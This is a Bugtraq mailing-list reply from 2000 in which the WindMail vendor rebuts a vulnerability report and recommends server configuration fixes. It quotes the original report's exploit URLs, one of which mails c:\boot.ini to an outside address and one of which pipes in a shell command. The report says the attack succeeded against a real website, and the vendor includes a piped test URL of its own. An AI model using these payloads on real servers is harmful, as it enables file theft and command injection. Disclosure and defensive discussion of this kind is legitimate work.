Bugtraq mailing list archives
Re: Windmail allow web user get any file
From: benc () GEOCEL COM (Ben Camp)
Date: Fri, 31 Mar 2000 11:43:25 -0600
In response to the following message:
Date: Sat, 25 Mar 2000 22:41:46 -0000 From: Frankie Zie <frankie () CNNS NET> To: BUGTRAQ () SECURITYFOCUS COM Subject: Windmail allow web user get any file I found some vulnerabilities if windmail run as a CGI application.tested On WindowsNT 4.0, Windmail 3.05 successfully. WindMail is a 32-bit Windows console program by geocel that gives you command-line e-mail messaging capability. You can download an evaluation copy of WindMail 3.0 at: http://www.geocel.com/download/wmail301e.exe WindMail has a feature that allow Mail HTML form results from CGI scripts I found windmail doesn't check either attachment file or special character for parameters, that allow you execute arbitrary command which web user can do: http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini% 20yourmail () mail com%20|%20dir%20c:\ After the request, windmail will send c:\boot.ini to yourmail () mail com and execute "dir c:\" command. For example: http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini% 20chinahack () 163 net After a while, check chinahack () 163 net, i got a copy of boot.ini from www.metro.net pp () cnns net http://www.cnns.net
There are two issues presented here, and since they're unrelated I'll approach them seperately. First is a reported pipe vulnerability, then a remote file send vulnerability. 1. REPORTED PIPE VULNERABILITY. I tried this a variety of ways, and even with other executables. IF this exists at all (I could not duplicate the execution of anything) it is most likely a GAPING IIS hole. Piping happens at the command interpreter level (before windmail is ever handed its portion of the command line). I tried a variety of methods to do this w/ his instructions (posted and sent to me previously) and have had zero luck. Additionally, because of the way IIS creates CGIs w/o real STDIO handles I seriously doubt that this is possible. If someone can demonstrate otherwise I'm very interested. This bug was removed from SERCURITYFOCUS.COM for these reasons (irreproducable / not WindMail related). Here is the final URL I was testing on: http://localhost/windmail.exe?%20-n%20c:\boot.ini%20benc () geocel com%20|%20c: \winnt\system32\cdplayer.exe This did not produce an instance of CDPLAYER.EXE at all. Even with the zero-security model pp () cnns net is testing under. This was tested for non executable command shell commands (like dir) as well as other command line apps. I tested this with windmail.exe, cscript.exe, cdplayer.exe to name a few. In the above example CDPLAYER.EXE should start as a hung process. It never starts and never gets hung. So I can say with reasonable certainty, after performing several tests and consulting with others, that this bug report is purely misinformational. 2. REMOTE FILE SEND VULNERABILITY First let me say this, because it has already been MISREPORTED in SANS Digest. WindMail is NOT a CGI program. WindMail is NOT to be placed in your CGI-BIN directory. This has been re-categorized on SECURITYFOCUS.COM as a configuration error. Just as you would not copy AT.EXE, CACLS.EXE, NET.EXE, NBTSTAT.EXE, etc.. to your CGI-BIN do not copy WINDMAIL.EXE to your CGI-BIN. Also, do not run your webserver as Administrator. WindMail is a command line mailer designed to work under the context of whoever is using it. Just as it would be bad to copy /bin/rm to your cgi-bin run your HTTPD as root, it would be wrong to say this is a problem with WindMail. This is essentially a server configuration problem which makes any functional program which accepts command line arguments (and was copied to a world executable directory like cgi-bin)exploitable to some degree. So, in a server configuration where the Web server is running as Administrator or the "System" account and where an administrator had against the recommendations of the documentation and example scripts copied WINDMAIL.EXE to their CGI-BIN there exists a vulnerability where any remote user can, with the access they've been granted in the configuration, send any file as an attachment. If the server is running as Domain Administrator (or any other trusted network user), remote users will also likely be able to email remote files with UNC paths (\\server\share\file). SUGGESTED USAGE: 1. Do not copy WINDMAIL.EXE to the CGI-BIN directory. Grant the appropriate rights to the WINDMAIL directory so that CGIs called from your web server can call WINDMAIL from its own directory. 2. Do not change the default user context which your webserver runs under (IUSR_SERVERNAME by default on IIS) if you do not understand the security implications. On IIS the permissions are rather strict by defaul. 3. Do not grant Execute access to directories that do not need it. This is just opening your server up to potential problems. OTHER SUGGESTIONS: Some users have requested that we add add a constraint for which directories files can be attached from. This will be implemented in the next version and will be set in the main configuration file. Please send any other suggestions or questions/comments/complaints to me directly at benc () geocel com. If you would like to be notified of updates/releases for WindMail and our other products email sales () geocel com. For the record, pp () cnns net has decided not to respond to my inquiries for more information. If he has some more information on the alleged PIPE VULNERABILITY the implications are pretty large and I'd like to see it. Thanks, Ben Camp benc () geocel com Geocel International
Current thread:
- Re: Windmail allow web user get any file Ben Camp (Mar 31)